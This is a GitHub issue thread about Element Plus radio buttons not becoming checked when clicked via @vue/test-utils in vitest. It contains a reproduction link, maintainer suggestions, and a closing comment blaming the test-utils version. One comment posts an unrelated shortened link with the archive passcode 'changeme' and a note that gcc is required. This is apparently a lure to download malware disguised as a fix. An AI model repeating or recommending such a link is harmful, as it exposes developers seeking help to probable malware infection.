### ISSUE TITLE
[radio, radio-group] el-radio 在 vitest 中无法使用 wrapper.trigger('click') 触发选中

### ISSUE THREAD

**Issue by JZLeung** [element-plus/element-plus#18191]
Bug Type: **`Other`**

## Environment

- Vue Version: `3.4.21`
- Element Plus Version: `2.6.0`
- Browser / OS: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36`
- Build Tool: `Vite`

### Related Component

- `el-radio`
- `el-radio-group`

### Reproduction Link

[Element Plus Playground](https://element-plus.run/#eyJBcHAudnVlIjoiPHNjcmlwdCBzZXR1cD5cbmltcG9ydCB7IHJlZiB9IGZyb20gJ3Z1ZSc7XG5pbXBvcnQgeyBFbFJhZGlvR3JvdXAsIEVsUmFkaW8gfSBmcm9tICdlbGVtZW50LXBsdXMnO1xuXG5jb25zdCByYWRpbyA9IHJlZigzKTtcbjwvc2NyaXB0PlxuXG48dGVtcGxhdGU+XG4gIDxFbFJhZGlvR3JvdXAgdi1tb2RlbD1cInJhZGlvXCI+XG4gICAgPEVsUmFkaW8gOnZhbHVlPVwiM1wiIHJlZj1cInJhZGlvMVwiPjM8L0VsUmFkaW8+XG4gICAgPEVsUmFkaW8gOnZhbHVlPVwiNlwiIHJlZj1cInJhZGlvMlwiPjY8L0VsUmFkaW8+XG4gICAgPEVsUmFkaW8gOnZhbHVlPVwiOVwiPjk8L0VsUmFkaW8+XG4gIDwvRWxSYWRpb0dyb3VwPlxuPC90ZW1wbGF0ZT5cbiIsImVsZW1lbnQtcGx1cy5qcyI6ImltcG9ydCBFbGVtZW50UGx1cyBmcm9tICdlbGVtZW50LXBsdXMnXG5pbXBvcnQgeyBnZXRDdXJyZW50SW5zdGFuY2UgfSBmcm9tICd2dWUnXG5cbmxldCBpbnN0YWxsZWQgPSBmYWxzZVxuYXdhaXQgbG9hZFN0eWxlKClcblxuZXhwb3J0IGZ1bmN0aW9uIHNldHVwRWxlbWVudFBsdXMoKSB7XG4gIGlmIChpbnN0YWxsZWQpIHJldHVyblxuICBjb25zdCBpbnN0YW5jZSA9IGdldEN1cnJlbnRJbnN0YW5jZSgpXG4gIGluc3RhbmNlLmFwcENvbnRleHQuYXBwLnVzZShFbGVtZW50UGx1cylcbiAgaW5zdGFsbGVkID0gdHJ1ZVxufVxuXG5leHBvcnQgZnVuY3Rpb24gbG9hZFN0eWxlKCkge1xuICBjb25zdCBzdHlsZXMgPSBbJ2h0dHBzOi8vZmFzdGx5LmpzZGVsaXZyLm5ldC9ucG0vZWxlbWVudC1wbHVzQDIuNi4wL2Rpc3QvaW5kZXguY3NzJywgJ2h0dHBzOi8vZmFzdGx5LmpzZGVsaXZyLm5ldC9ucG0vZWxlbWVudC1wbHVzQDIuNi4wL3RoZW1lLWNoYWxrL2RhcmsvY3NzLXZhcnMuY3NzJ10ubWFwKChzdHlsZSkgPT4ge1xuICAgIHJldHVybiBuZXcgUHJvbWlzZSgocmVzb2x2ZSwgcmVqZWN0KSA9PiB7XG4gICAgICBjb25zdCBsaW5rID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnbGluaycpXG4gICAgICBsaW5rLnJlbCA9ICdzdHlsZXNoZWV0J1xuICAgICAgbGluay5ocmVmID0gc3R5bGVcbiAgICAgIGxpbmsuYWRkRXZlbnRMaXN0ZW5lcignbG9hZCcsIHJlc29sdmUpXG4gICAgICBsaW5rLmFkZEV2ZW50TGlzdGVuZXIoJ2Vycm9yJywgcmVqZWN0KVxuICAgICAgZG9jdW1lbnQuYm9keS5hcHBlbmQobGluaylcbiAgICB9KVxuICB9KVxuICByZXR1cm4gUHJvbWlzZS5hbGxTZXR0bGVkKHN0eWxlcylcbn0iLCJ0c2NvbmZpZy5qc29uIjoie1xuICBcImNvbXBpbGVyT3B0aW9uc1wiOiB7XG4gICAgXCJ0YXJnZXRcIjogXCJFU05leHRcIixcbiAgICBcImpzeFwiOiBcInByZXNlcnZlXCIsXG4gICAgXCJtb2R1bGVcIjogXCJFU05leHRcIixcbiAgICBcIm1vZHVsZVJlc29sdXRpb25cIjogXCJCdW5kbGVyXCIsXG4gICAgXCJ0eXBlc1wiOiBbXCJlbGVtZW50LXBsdXMvZ2xvYmFsLmQudHNcIl0sXG4gICAgXCJhbGxvd0ltcG9ydGluZ1RzRXh0ZW5zaW9uc1wiOiB0cnVlLFxuICAgIFwiYWxsb3dKc1wiOiB0cnVlLFxuICAgIFwiY2hlY2tKc1wiOiB0cnVlXG4gIH0sXG4gIFwidnVlQ29tcGlsZXJPcHRpb25zXCI6IHtcbiAgICBcInRhcmdldFwiOiAzLjNcbiAgfVxufVxuIiwiUGxheWdyb3VuZE1haW4udnVlIjoiPHNjcmlwdCBzZXR1cD5cbmltcG9ydCBBcHAgZnJvbSAnLi9BcHAudnVlJ1xuaW1wb3J0IHsgc2V0dXBFbGVtZW50UGx1cyB9IGZyb20gJy4vZWxlbWVudC1wbHVzLmpzJ1xuc2V0dXBFbGVtZW50UGx1cygpXG48L3NjcmlwdD5cblxuPHRlbXBsYXRlPlxuICA8QXBwIC8+XG48L3RlbXBsYXRlPlxuIiwiaW1wb3J0LW1hcC5qc29uIjoie1xuICBcImltcG9ydHNcIjoge1xuICAgIFwidnVlXCI6IFwiaHR0cHM6Ly9mYXN0bHkuanNkZWxpdnIubmV0L25wbS9AdnVlL3J1bnRpbWUtZG9tQDMuNC4yMS9kaXN0L3J1bnRpbWUtZG9tLmVzbS1icm93c2VyLmpzXCIsXG4gICAgXCJAdnVlL3NoYXJlZFwiOiBcImh0dHBzOi8vZmFzdGx5LmpzZGVsaXZyLm5ldC9ucG0vQHZ1ZS9zaGFyZWRAMy40LjIxL2Rpc3Qvc2hhcmVkLmVzbS1idW5kbGVyLmpzXCIsXG4gICAgXCJlbGVtZW50LXBsdXNcIjogXCJodHRwczovL2Zhc3RseS5qc2RlbGl2ci5uZXQvbnBtL2VsZW1lbnQtcGx1c0AyLjYuMC9kaXN0L2luZGV4LmZ1bGwubWluLm1qc1wiLFxuICAgIFwiZWxlbWVudC1wbHVzL1wiOiBcImh0dHBzOi8vZmFzdGx5LmpzZGVsaXZyLm5ldC9ucG0vZWxlbWVudC1wbHVzQDIuNi4wL1wiLFxuICAgIFwiQGVsZW1lbnQtcGx1cy9pY29ucy12dWVcIjogXCJodHRwczovL2Zhc3RseS5qc2RlbGl2ci5uZXQvbnBtL0BlbGVtZW50LXBsdXMvaWNvbnMtdnVlQDIvZGlzdC9pbmRleC5taW4uanNcIlxuICB9LFxuICBcInNjb3Blc1wiOiB7fVxufSIsInJhZGlvLnRlc3QuanN4IjoiaW1wb3J0IHsgbmV4dFRpY2sgfSBmcm9tICd2dWUnXHJcbmltcG9ydCB7IG1vdW50IH0gZnJvbSAnQHZ1ZS90ZXN0LXV0aWxzJ1xyXG5pbXBvcnQgeyBkZXNjcmliZSwgZXhwZWN0LCBpdCB9IGZyb20gJ3ZpdGVzdCdcclxuXHJcbmltcG9ydCBSYWRpb0NvbXBvbmVudCBmcm9tICcuLi9zcmMvcmFkaW8udnVlJ1xyXG5cclxuZGVzY3JpYmUoJ1JhZGlvIGdyb3VwJywgKCkgPT4ge1xyXG4gIGl0KCdjcmVhdGUnLCBhc3luYyAoKSA9PiB7XHJcbiAgICBjb25zdCB3cmFwcGVyID0gbW91bnQoUmFkaW9Db21wb25lbnQpXHJcbiAgICBhd2FpdCBuZXh0VGljaygpXHJcblxyXG4gICAgY29uc3QgW3JhZGlvMSwgcmFkaW8yXSA9IHdyYXBwZXIuZmluZEFsbCgnLmVsLXJhZGlvJylcclxuICAgIGV4cGVjdChyYWRpbzEuY2xhc3NlcygpKS50b0NvbnRhaW4oJ2lzLWNoZWNrZWQnKVxyXG5cclxuICAgIGF3YWl0IHJhZGlvMi50cmlnZ2VyKCdjbGljaycpXHJcbiAgICBleHBlY3QocmFkaW8yLmNsYXNzZXMoKSkudG9Db250YWluKCdpcy1jaGVja2VkJylcclxuICB9KVxyXG59KVxyXG4iLCJfbyI6e319)

### Steps to reproduce

1、npm run test

### What is Expected?

1、测试用例通过

### What is actually happening?

报错：AssertionError: expected [ 'el-radio' ] to include 'is-checked'
原因是 click 事件并没有正确触发

### Additional comments

我尝试过在控制台中使用 document.querySelector('.el-radio').dispatchEvent(new Event('click')) 也无法使radio选中

相关依赖：
"vitest": "^1.5.2",
"@vue/test-utils": "^2.4.5",

**Comment by yousefsk345** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler

**Comment by chenxch** [comment]
```js
document.querySelector('.el-radio__original').click()
```

**Comment by chenxch** [comment]
参考
https://github.com/element-plus/element-plus/blob/2dbe2bf4af5bcca895a2803a184d8193083e6ff1/packages/components/radio/__tests__/radio.test.tsx#L13-L17

**Comment by JZLeung** [comment]
> 参考
> 
> https://github.com/element-plus/element-plus/blob/2dbe2bf4af5bcca895a2803a184d8193083e6ff1/packages/components/radio/__tests__/radio.test.tsx#L13-L17

你好，就是参考了这个测试用例，才发现不可以。

在控制台确实可以通过 `document.querySelector('.el-radio').click()` 实现模拟点击，但是在 vitest 中，是通过 `dom.dispatchEvent()` 来模拟 click 事件的。

https://github.com/vuejs/test-utils/blob/v2.0.0/src/baseWrapper.ts#L341

**Comment by chenxch** [comment]
能否提供一个mini repo

**Comment by JZLeung** [comment]
[mini-repo](https://codesandbox.io/p/sandbox/trusting-sid-xr2dhv)

**Comment by btea** [comment]
`@vue/test-utils`版本问题，element-plus目前使用的版本是可以的。
